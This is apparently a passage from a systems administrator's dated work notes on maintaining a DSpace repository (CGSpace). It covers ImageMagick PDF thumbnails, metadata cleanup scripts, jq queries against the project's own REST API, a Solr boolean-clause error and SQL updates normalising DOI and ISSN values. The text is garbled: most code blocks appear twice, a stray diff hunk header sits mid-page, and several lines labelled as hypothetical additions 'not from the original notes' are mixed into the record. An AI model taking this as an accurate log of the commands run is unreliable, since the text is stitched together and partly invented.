<li>I see some excellent suggestions in this <a href="https://www.imagemagick.org/discourse-server/viewtopic.php?t=21589">ImageMagick thread from 2012</a> that led me to some nice thumbnails (default PDF density is 72, so supersample to 4X and then resize back to 25%) as well as <a href="https://duncanlock.net/blog/2013/11/18/how-to-create-thumbnails-for-pdfs-with-imagemagick-on-linux/">this blog post</a>:</li>
</ul>
<pre><code>$ convert -density 288 -filter lagrange -thumbnail 25% -background white -alpha remove -sampling-factor 1:1 -colorspace sRGB 10568-97925.pdf\[0\] 10568-97925.jpg
<pre tabindex="0"><code>$ convert -density 288 -filter lagrange -thumbnail 25% -background white -alpha remove -sampling-factor 1:1 -colorspace sRGB 10568-97925.pdf\[0\] 10568-97925.jpg
</code></pre><ul>
<li>Here I&rsquo;m also explicitly setting the background to white and removing any alpha layers, but I could probably also just keep using <code>-flatten</code> like DSpace already does</li>
<li>I did some tests with a modified version of the above that uses <code>-flatten</code> and drops the sampling-factor and colorspace, but bumps up the image size to 600px (default on CGSpace is currently 300):</li>
</ul>
<pre><code>$ convert -density 288 -filter lagrange -resize 25% -flatten 10568-97925.pdf\[0\] 10568-97925-d288-lagrange.pdf.jpg
<pre tabindex="0"><code>$ convert -density 288 -filter lagrange -resize 25% -flatten 10568-97925.pdf\[0\] 10568-97925-d288-lagrange.pdf.jpg
$ convert -flatten 10568-97925.pdf\[0\] 10568-97925.pdf.jpg
$ convert -thumbnail x600 10568-97925-d288-lagrange.pdf.jpg 10568-97925-d288-lagrange-thumbnail.pdf.jpg
$ convert -thumbnail x600 10568-97925.pdf.jpg 10568-97925-thumbnail.pdf.jpg
@ -404,9 +404,9 @@ $ convert -thumbnail x600 10568-97925.pdf.jpg 10568-97925-thumbnail.pdf.jpg
<li>The file size is about double the old ones, but the quality is very good and still nowhere near ilri.org&rsquo;s 400KiB PNG!</li>
<li>Peter sent me the corrections and deletions for affiliations last night so I imported them into OpenRefine to work around the normal UTF-8 issue, ran them through csv-metadata-quality to make sure all Unicode values were normalized (NFC), then applied them on DSpace Test and CGSpace:</li>
</ul>
<pre><code>$ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct
$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],cg.contributor.affiliation&#39;
$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct
$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><h2 id="2020-01-26">2020-01-26</h2>
<ul>
<li>Add &ldquo;Gender&rdquo; to controlled vocabulary for CRPs (<a href="https://github.com/ilri/DSpace/pull/442">#442</a>)</li>
</ul>
</li>
</ul>
<pre><code>$ convert -density 288 10568-97925.pdf\[0\] -density 72 -filter lagrange -flatten 10568-97925-density.jpg
<pre tabindex="0"><code>$ convert -density 288 10568-97925.pdf\[0\] -density 72 -filter lagrange -flatten 10568-97925-density.jpg
</code></pre><ul>
<li>One thing worth mentioning was this syntax for extracting bits from JSON in bash using <code>jq</code>:</li>
</ul>
<pre><code>$ RESPONSE=$(curl -s 'https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams')
$ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName==&quot;ORIGINAL&quot;) | .retrieveLink'
&quot;/bitstreams/172559/retrieve&quot;
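# (hypothetical follow-up, not from the original notes: with jq's -r flag the
# surrounding quotes are stripped, and the link is relative to the REST API root,
# so one could download the bitstream like this)
$ BITSTREAM=$(echo $RESPONSE | jq -r '.bitstreams[] | select(.bundleName==&quot;ORIGINAL&quot;) | .retrieveLink')
$ curl -s -o bitstream.pdf &quot;https://dspacetest.cgiar.org/rest$BITSTREAM&quot;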
<pre tabindex="0"><code>$ RESPONSE=$(curl -s &#39;https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams&#39;)
$ echo $RESPONSE | jq &#39;.bitstreams[] | select(.bundleName==&#34;ORIGINAL&#34;) | .retrieveLink&#39;
&#34;/bitstreams/172559/retrieve&#34;
</code></pre><h2 id="2020-01-27">2020-01-27</h2>
<ul>
<li>Bizu has been having problems when she logs into CGSpace, she can&rsquo;t see the community list on the front page
</ul>
</li>
</ul>
<pre><code>2020-01-27 06:02:23,681 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] ': too many boolean clauses
<pre tabindex="0"><code>2020-01-27 06:02:23,681 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] &#39;: too many boolean clauses
</code></pre><ul>
<li>Now this appears to be a Solr limit of some kind (&ldquo;too many boolean clauses&rdquo;)
<ul>
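<li>(A hedged aside, not from the original notes: &ldquo;too many boolean clauses&rdquo; is governed by Solr&rsquo;s <code>maxBooleanClauses</code> setting, which defaults to 1024 and, assuming the stock DSpace Solr layout, lives in the search core&rsquo;s <code>solrconfig.xml</code>:)
<pre><code>$ grep maxBooleanClauses dspace/solr/search/conf/solrconfig.xml
    &lt;maxBooleanClauses&gt;1024&lt;/maxBooleanClauses&gt;
</code></pre>
</li>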
<ul>
<li>Generate a list of CIP subjects for Abenet:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.cip&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.cip&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
COPY 77
</code></pre><ul>
<li>Start looking over the IITA records from earlier this month (<a href="https://dspacetest.cgiar.org/handle/10568/106567">IITA_201907_Jan13</a>)
<ul>
<li>Normalize about 4,500 DOI, YouTube, and SlideShare links on CGSpace that are missing HTTPS or use an old URL format:</li>
</ul>
<pre><code>UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://www.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://dx.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.youtube.com', 'https://www.youtube.com') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.youtube.com%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.slideshare.net', 'https://www.slideshare.net') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.slideshare.net%';
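-- (hypothetical sanity check, not from the original notes: count how many rows a
-- pattern matches before running the corresponding UPDATE, for example)
SELECT COUNT(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://dx.doi.org%';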
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://www.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://dx.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.youtube.com&#39;, &#39;https://www.youtube.com&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE &#39;http://www.youtube.com%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.slideshare.net&#39;, &#39;https://www.slideshare.net&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE &#39;http://www.slideshare.net%&#39;;
</code></pre><ul>
<li>I exported a list of all of our ISSNs with item IDs so that I could fix them in OpenRefine and submit them with multi-value separators to DSpace metadata import:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT resource_id as &quot;id&quot;, text_value as &quot;dc.identifier.issn&quot; FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT resource_id as &#34;id&#34;, text_value as &#34;dc.identifier.issn&#34; FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
COPY 23339
</code></pre><ul>
<li>Then, after spending two hours correcting 1,000 ISSNs, I realized that I need to normalize the <code>text_lang</code> fields in the database first, or else they will all look like changes due to the mix of &ldquo;en_US&rdquo;, NULL, etc values (for both ISSN and ISBN):</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
UPDATE 30454
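-- (hypothetical check, not from the original notes: this is how one could see the
-- mix of text_lang values beforehand)
dspace=# SELECT text_lang, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id IN (20,21) GROUP BY text_lang;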
</code></pre><ul>
<li>Then I realized that my initial PostgreSQL query wasn&rsquo;t so genius because if a field already has multiple values it will appear on separate lines with the same ID, so when <code>dspace metadata-import</code> sees it, the change will be removed and added, or added and removed, depending on the order it is seen!</li>
<li>A better course of action is to select the distinct ones and then correct them using <code>fix-metadata-values.py</code>&hellip;</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.identifier.issn[en_US]&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.identifier.issn[en_US]&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
COPY 2900
</code></pre><ul>
<li>I re-applied all my corrections, filtering out things like multi-value separators and values that are actually ISBNs so I can fix them later</li>
<li>Then I applied 181 fixes for ISSNs using <code>fix-metadata-values.py</code> on DSpace Test and CGSpace (after testing locally):</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p 'fuuu' -f 'dc.identifier.issn[en_US]' -m 21 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p &#39;fuuu&#39; -f &#39;dc.identifier.issn[en_US]&#39; -m 21 -t correct -d
</code></pre><h2 id="2020-01-30">2020-01-30</h2>
<ul>
<li>About to start working on the DSpace 6 port and I&rsquo;m looking at commits that are in the not-yet-tagged DSpace 6.4: